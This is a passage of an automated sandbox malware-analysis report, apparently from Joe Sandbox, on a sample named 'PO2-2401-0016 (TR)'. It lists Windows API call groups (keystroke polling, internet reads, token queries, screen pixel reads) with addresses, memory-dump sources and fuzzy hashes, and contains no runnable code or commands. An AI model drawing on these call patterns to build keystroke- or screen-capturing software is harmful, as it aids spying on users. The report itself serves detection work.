                                • GetAsyncKeyState.USER32(00000001), ref: 00169183
                                • GetAsyncKeyState.USER32(00000002), ref: 0016919D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AsyncState$ClientCursorScreen
                                • String ID:
                                • API String ID: 4210589936-0
                                • Opcode ID: 9f756a24147d76ac289acef590693bb1f4f4333c7f1c6cb7949cb0da69e48891
                                • Instruction ID: c32a2d5036ef5c5d77177310a138939da6bd5106d9c9cecd2e6a31c48aa97bb3
                                • Opcode Fuzzy Hash: 9f756a24147d76ac289acef590693bb1f4f4333c7f1c6cb7949cb0da69e48891
                                • Instruction Fuzzy Hash: 2B415E75A0864AEBDF199F68CC44BEEB7B8FF06330F248215E425A72D0C7346A54CB91
                                APIs
                                • GetInputState.USER32 ref: 001C38CB
                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 001C3922
                                • TranslateMessage.USER32(?), ref: 001C394B
                                • DispatchMessageW.USER32(?), ref: 001C3955
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001C3966
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                • String ID:
                                • API String ID: 2256411358-0
                                • Opcode ID: 104c46737bd892c78bc9a54177bc9779ed329bcccbc24e76a682f429c596af81
                                • Instruction ID: de07da64279ef1423df1163ddd52559559d8c7e2f1c386c9d47191b31e3a7bcf
                                • Opcode Fuzzy Hash: 104c46737bd892c78bc9a54177bc9779ed329bcccbc24e76a682f429c596af81
                                • Instruction Fuzzy Hash: 7731B970904381AEEB35CBB4AC4DFB677A4AB35308F04856DE472865A0D3F5D686CB51
                                APIs
                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,001CC21E,00000000), ref: 001CCF38
                                • InternetReadFile.WININET(?,00000000,?,?), ref: 001CCF6F
                                • GetLastError.KERNEL32(?,00000000,?,?,?,001CC21E,00000000), ref: 001CCFB4
                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,001CC21E,00000000), ref: 001CCFC8
                                • SetEvent.KERNEL32(?,?,00000000,?,?,?,001CC21E,00000000), ref: 001CCFF2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                • String ID:
                                • API String ID: 3191363074-0
                                • Opcode ID: b909f00b97fdf44572fb6a7b8daa972c480e1a8b76008ccbc9f76b559bc1aa10
                                • Instruction ID: 4c06c71d1c9792f0457488f15fef66c0b22df8b005b0fb17a822d8f05329ce31
                                • Opcode Fuzzy Hash: b909f00b97fdf44572fb6a7b8daa972c480e1a8b76008ccbc9f76b559bc1aa10
                                • Instruction Fuzzy Hash: 5C314B71900205AFDB24DFA5D884EAEBBF9EB24350B10442EF51AD6540DB30EE41DBA0
                                APIs
                                • GetWindowRect.USER32(?,?), ref: 001B1915
                                • PostMessageW.USER32(00000001,00000201,00000001), ref: 001B19C1
                                • Sleep.KERNEL32(00000000,?,?,?), ref: 001B19C9
                                • PostMessageW.USER32(00000001,00000202,00000000), ref: 001B19DA
                                • Sleep.KERNEL32(00000000,?,?,?,?), ref: 001B19E2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessagePostSleep$RectWindow
                                • String ID:
                                • API String ID: 3382505437-0
                                • Opcode ID: dac19da16d6f1bf9f99bf966ab993ad51d96ebde6e24deb9460be94268ee72a9
                                • Instruction ID: 00f8b5812e3b08875a98a42a7f0d70d1515674c032fa034aed988536738ffd84
                                • Opcode Fuzzy Hash: dac19da16d6f1bf9f99bf966ab993ad51d96ebde6e24deb9460be94268ee72a9
                                • Instruction Fuzzy Hash: 6A31C072A00259FFCB04CFA8CDA9ADE3BB5EB05319F514229F921EB2D1C7709944CB90
                                APIs
                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 001E5745
                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 001E579D
                                • _wcslen.LIBCMT ref: 001E57AF
                                • _wcslen.LIBCMT ref: 001E57BA
                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 001E5816
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$_wcslen
                                • String ID:
                                • API String ID: 763830540-0
                                • Opcode ID: 483fbff1a91d98e8a25715c84f16fb7f69900c74e6250a69d474c852f9994732
                                • Instruction ID: eb62fbbe09eb0fbf4546a175201c600512fb0a6b3e4760f3f22ee9e8a4d0a58c
                                • Opcode Fuzzy Hash: 483fbff1a91d98e8a25715c84f16fb7f69900c74e6250a69d474c852f9994732
                                • Instruction Fuzzy Hash: 8021A531D04A989ADB208FA1CC84AEE7BB9FF14328F148216E919EB1C1E7708985CF50
                                APIs
                                • IsWindow.USER32(00000000), ref: 001D0951
                                • GetForegroundWindow.USER32 ref: 001D0968
                                • GetDC.USER32(00000000), ref: 001D09A4
                                • GetPixel.GDI32(00000000,?,00000003), ref: 001D09B0
                                • ReleaseDC.USER32(00000000,00000003), ref: 001D09E8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$ForegroundPixelRelease
                                • String ID:
                                • API String ID: 4156661090-0
                                • Opcode ID: 5e5597632bce9635dd8546a505fe3e8fab7f1da0714272e41b1629c03a08f3ef
                                • Instruction ID: a79f7cd2c16cf434429be110859946a4f6b2228885591f96f115cf7f3228d353
                                • Opcode Fuzzy Hash: 5e5597632bce9635dd8546a505fe3e8fab7f1da0714272e41b1629c03a08f3ef
                                • Instruction Fuzzy Hash: 7A216F35600204AFD704EFA9DC94AAEBBE5FF58701F04846DE85ADB752DB70AC45CB90
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0018CDC6
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0018CDE9
                                  • Part of subcall function 00183820: RtlAllocateHeap.NTDLL(00000000,?,00221444,?,0016FDF5,?,?,0015A976,00000010,00221440,001513FC,?,001513C6,?,00151129), ref: 00183852
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0018CE0F
                                • _free.LIBCMT ref: 0018CE22
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0018CE31
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: f4b2845e8363dc79ed137dc846a2b53a77e1cc5a9c44b2e77522147284e53798
                                • Instruction ID: e958602a2ae63b4e5817c00d4e1eae09f62383bd76fd0888ea4d19a03a944981
                                • Opcode Fuzzy Hash: f4b2845e8363dc79ed137dc846a2b53a77e1cc5a9c44b2e77522147284e53798
                                • Instruction Fuzzy Hash: D40184726016557F232136BA6C88D7F6E6DEFC6BA13154129F905C7201EB718F028BF0
                                APIs
                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00169693
                                • SelectObject.GDI32(?,00000000), ref: 001696A2
                                • BeginPath.GDI32(?), ref: 001696B9
                                • SelectObject.GDI32(?,00000000), ref: 001696E2
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ObjectSelect$BeginCreatePath
                                • String ID:
                                • API String ID: 3225163088-0
                                • Opcode ID: 5169f6e42dfb5c5c2bc93393e032814e41d3b6068bffa3a63fa961d53a09697d
                                • Instruction ID: e44c796555f198626d25065c5465cccc452d12356bef9d7c3f5710b95ac31fdf
                                • Opcode Fuzzy Hash: 5169f6e42dfb5c5c2bc93393e032814e41d3b6068bffa3a63fa961d53a09697d
                                • Instruction Fuzzy Hash: F9214CB0802385EBDB219FA4EC58BAD3BA9BF61755F10061AF410A61B0D37099F3CF94
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _memcmp
                                • String ID:
                                • API String ID: 2931989736-0
                                • Opcode ID: 3a57c3e1db3537d09648e8c684d3ce9d96f5964333bab13e0d5b8ee069afe72a
                                • Instruction ID: 3e744240950d7f23664eb20e4685a98fd9e3055b593b1d9a5091baeb7cab6983
                                • Opcode Fuzzy Hash: 3a57c3e1db3537d09648e8c684d3ce9d96f5964333bab13e0d5b8ee069afe72a
                                • Instruction Fuzzy Hash: 0F017971741A05BBE30857159D82FFF736FAB713A8FA44025FD089B641FB61EE1282A1
                                APIs
                                • GetLastError.KERNEL32(?,?,?,0017F2DE,00183863,00221444,?,0016FDF5,?,?,0015A976,00000010,00221440,001513FC,?,001513C6), ref: 00182DFD
                                • _free.LIBCMT ref: 00182E32
                                • _free.LIBCMT ref: 00182E59
                                • SetLastError.KERNEL32(00000000,00151129), ref: 00182E66
                                • SetLastError.KERNEL32(00000000,00151129), ref: 00182E6F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: bf65d64b554494f2a9de40a0d988fbf98899517144fcb6ad5a623077a1ae846c
                                • Instruction ID: b74181cce1624f5f65229d36570dc6011b31d137c78fe4e5194cb2eb77382830
                                • Opcode Fuzzy Hash: bf65d64b554494f2a9de40a0d988fbf98899517144fcb6ad5a623077a1ae846c
                                • Instruction Fuzzy Hash: D3012836645A007BC62377747C89D6F265EABE17B5B364028F825A32D2EF348F014F64
                                APIs
                                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?,?,?,001B035E), ref: 001B002B
                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?,?), ref: 001B0046
                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?,?), ref: 001B0054
                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?), ref: 001B0064
                                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?,?), ref: 001B0070
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                • String ID:
                                • API String ID: 3897988419-0
                                • Opcode ID: c10d0cd7b368cf0e37a33ae62399fbd4a67cc09aadead78c4f029ad64945c1b7
                                • Instruction ID: 5e82318942e018037074c7c26c7a91e17c5eb2299172f563645bd6342c1c84dc
                                • Opcode Fuzzy Hash: c10d0cd7b368cf0e37a33ae62399fbd4a67cc09aadead78c4f029ad64945c1b7
                                • Instruction Fuzzy Hash: CA018F72600204BFDB125FA8DC44FEF7AADEB48791F144128F905D6210D771DD818BA0
                                APIs
                                • QueryPerformanceCounter.KERNEL32(?), ref: 001BE997
                                • QueryPerformanceFrequency.KERNEL32(?), ref: 001BE9A5
                                • Sleep.KERNEL32(00000000), ref: 001BE9AD
                                • QueryPerformanceCounter.KERNEL32(?), ref: 001BE9B7
                                • Sleep.KERNEL32 ref: 001BE9F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                • String ID:
                                • API String ID: 2833360925-0
                                • Opcode ID: 6a1925cb3ca0607944f05eadc184df51a5ffd1a0c906d7128ed5216db8e2cc24
                                • Instruction ID: fa44b8d00f33f95147c47a4bbdbc8ef91c4de7321d3296911f926bbd54e334ef
                                • Opcode Fuzzy Hash: 6a1925cb3ca0607944f05eadc184df51a5ffd1a0c906d7128ed5216db8e2cc24
                                • Instruction Fuzzy Hash: 99012531C01629DBCF00AFE5DC99AEDBBB8FF09705F010556E902B6241CB30A699CBA1
                                APIs
                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 001B1114
                                • GetLastError.KERNEL32(?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B1120
                                • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B112F
                                • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,001B0B9B,?,?,?), ref: 001B1136
                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 001B114D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                • String ID:
                                • API String ID: 842720411-0
                                • Opcode ID: f76494255bdeda662568a3f15695662905a798cffad94144f2a9fcc165262753
                                • Instruction ID: 465eebd2543eb461139ff385fef29d4f5b5d0c48c1df7439c1ab3acb9955c346
                                • Opcode Fuzzy Hash: f76494255bdeda662568a3f15695662905a798cffad94144f2a9fcc165262753
                                • Instruction Fuzzy Hash: FB018179500205BFDB114FA8DC89EAE3F6EEF86360B150418FA41C7350DB31DC418BA0
                                APIs
                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001B0FCA
                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001B0FD6
                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001B0FE5
                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001B0FEC
                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001B1002
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                • String ID:
                                • API String ID: 44706859-0
                                • Opcode ID: f2ce5e3445e4cb6bb67e75d652101ae0854e26ba7e2259fe31d57c8f6447a040
                                • Instruction ID: 599e9936f87d08dfc6ea5be66b7b6e55289394f4995e8dd25743e20eae4b6c2e
                                • Opcode Fuzzy Hash: f2ce5e3445e4cb6bb67e75d652101ae0854e26ba7e2259fe31d57c8f6447a040
                                • Instruction Fuzzy Hash: C1F04939200345FBDB215FA49C8DF9A3BADEF8A762F614415FE45CA651CB70DC818BA0
                                APIs
                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 001B102A
                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 001B1036
                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001B1045
                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 001B104C
                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 001B1062
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                • String ID:
                                • API String ID: 44706859-0
                                • Opcode ID: 56869306bf8377c448402fe25ccb47275ff7832e29634f1e5da809ec873a3120
                                • Instruction ID: cdb0f7641aa69fefaf5f8958020618415bc2e9da5b5d7ae4a01c25d16c6d56bd
                                • Opcode Fuzzy Hash: 56869306bf8377c448402fe25ccb47275ff7832e29634f1e5da809ec873a3120
                                • Instruction Fuzzy Hash: 61F04F39100341FBD7215FA4EC99F9A3B6DEF8A761F610414FD45CA650CB70D8818AA0
                                APIs
                                • CloseHandle.KERNEL32(?,?,?,?,001C017D,?,001C32FC,?,00000001,00192592,?), ref: 001C0324
                                • CloseHandle.KERNEL32(?,?,?,?,001C017D,?,001C32FC,?,00000001,00192592,?), ref: 001C0331
                                • CloseHandle.KERNEL32(?,?,?,?,001C017D,?,001C32FC,?,00000001,00192592,?), ref: 001C033E
                                • CloseHandle.KERNEL32(?,?,?,?,001C017D,?,001C32FC,?,00000001,00192592,?), ref: 001C034B
                                • CloseHandle.KERNEL32(?,?,?,?,001C017D,?,001C32FC,?,00000001,00192592,?), ref: 001C0358
                                • CloseHandle.KERNEL32(?,?,?,?,001C017D,?,001C32FC,?,00000001,00192592,?), ref: 001C0365
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseHandle
                                • String ID:
                                • API String ID: 2962429428-0
                                • Opcode ID: fdc14175c91c69d7c468d612b0cadb219369c9fbd1fec103cba9190b497c596e
                                • Instruction ID: a38da16d7f258c06d9e74c4272991f74404e954a857839e5a82c99d01665fd7a
                                • Opcode Fuzzy Hash: fdc14175c91c69d7c468d612b0cadb219369c9fbd1fec103cba9190b497c596e
                                • Instruction Fuzzy Hash: FB01EE72800B81CFCB32AF66D880802FBF9BF603153059A3FD19252931C3B1A989CF80
                                APIs
                                • _free.LIBCMT ref: 0018D752
                                  • Part of subcall function 001829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000), ref: 001829DE
                                  • Part of subcall function 001829C8: GetLastError.KERNEL32(00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000,00000000), ref: 001829F0
                                • _free.LIBCMT ref: 0018D764
                                • _free.LIBCMT ref: 0018D776
                                • _free.LIBCMT ref: 0018D788
                                • _free.LIBCMT ref: 0018D79A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 4983f00e7595060a01d7321fc2dc210ae95114eae5681df88db95a08c6e502d4
                                • Instruction ID: c65d8b95ff346c1a461134dce79e44d5ca6767d63c1cfe7225bc4c62264a7d1c
